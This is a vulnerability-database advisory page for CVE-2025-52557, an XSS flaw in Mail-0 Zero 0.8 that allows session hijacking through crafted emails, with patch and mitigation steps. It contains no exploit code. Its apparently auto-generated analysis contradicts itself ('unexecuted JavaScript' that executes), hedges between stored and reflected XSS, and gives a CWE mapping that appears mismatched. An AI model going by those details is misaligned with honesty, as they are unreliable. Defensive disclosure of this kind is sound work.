CVE-2025-52557

| EUVD-2025-18797 HIGH
2025-06-21 [email protected]
8.6
CVSS 4.0
Share

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P

Lifecycle Timeline

3
Analysis Generated
Mar 15, 2026 - 21:35 vuln.today
EUVD ID Assigned
Mar 15, 2026 - 21:35 euvd
EUVD-2025-18797
CVE Published
Jun 21, 2025 - 02:15 nvd
HIGH 8.6

Tags

Information Disclosure XSS Session Fixation

Description

Mail-0's Zero is an open-source email solution. In version 0.8 it's possible for an attacker to craft an email that executes javascript leading to session hijacking due to improper sanitization. This issue has been patched in version 0.81.

Analysis

CVE-2025-52557 is a stored/reflected XSS vulnerability in Mail-0's Zero email solution (version 0.8) that allows unauthenticated attackers to craft malicious emails containing unexecuted JavaScript code. When a victim opens the email in the web interface, the JavaScript executes in their browser context, enabling session hijacking and potential account takeover. The vulnerability has been patched in version 0.81, and exploitation requires user interaction (opening the email), making it a moderate-to-high severity issue suitable for rapid patching.

Technical Context

Mail-0 Zero is an open-source email client/server solution that processes and renders email messages in a web interface. The vulnerability stems from CWE-1384 (Improper Neutralization of Noninput Request Data Before Storage or Transmission), which is a variant of improper input sanitization affecting email content handling. The root cause is inadequate HTML/JavaScript sanitization when parsing email messages before rendering them in the browser DOM. The email parsing/rendering pipeline fails to strip or escape dangerous HTML tags (such as <script>, event handlers like onclick, or other XSS vectors) from email bodies. When the email is displayed to an authenticated user via the web UI, the unsanitized content executes with the privileges of the user's authenticated session, allowing the attacker to steal session tokens, cookies, or perform actions on behalf of the victim. CPE identification would be: cpe:2.3:a:mail-0:zero:0.8:*:*:*:*:*:*:*

Affected Products

- vendor: Mail-0; product: Zero; affected_version: 0.8; patched_version: 0.81; cpe: cpe:2.3:a:mail-0:zero:0.8:*:*:*:*:*:*:*; component: Email message rendering engine / web UI; deployment_scope: Open-source email solution; affects self-hosted and cloud deployments using affected versions

Remediation

Upgrade Mail-0 Zero from version 0.8 to version 0.81 or later; priority: IMMEDIATE; steps: ['Review Mail-0 Zero release notes and changelog for version 0.81+', 'Test patch in non-production environment', 'Deploy patch to all instances running version 0.8', 'Verify successful upgrade and test email rendering functionality'] Workaround (temporary, pre-patch): Disable or restrict web UI access until patch is applied; steps: ['Configure reverse proxy (nginx/Apache) to restrict access to web UI to trusted IPs only', 'Instruct users to use alternative email clients (IMAP/POP3) instead of web interface', 'Implement Content Security Policy (CSP) headers to restrict inline script execution (defense-in-depth)'] Detection and Monitoring: Monitor for exploitation attempts; steps: ['Review email message logs for suspicious JavaScript content in message bodies', 'Monitor session logs for anomalous authentication patterns (session reuse from unexpected IPs)', 'Implement WAF/IDS rules to detect XSS payloads in email headers/bodies']

Priority Score

43
Low Medium High Critical
KEV: 0
EPSS: +0.1
CVSS: +43
POC: 0

Share

CVE-2025-52557 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy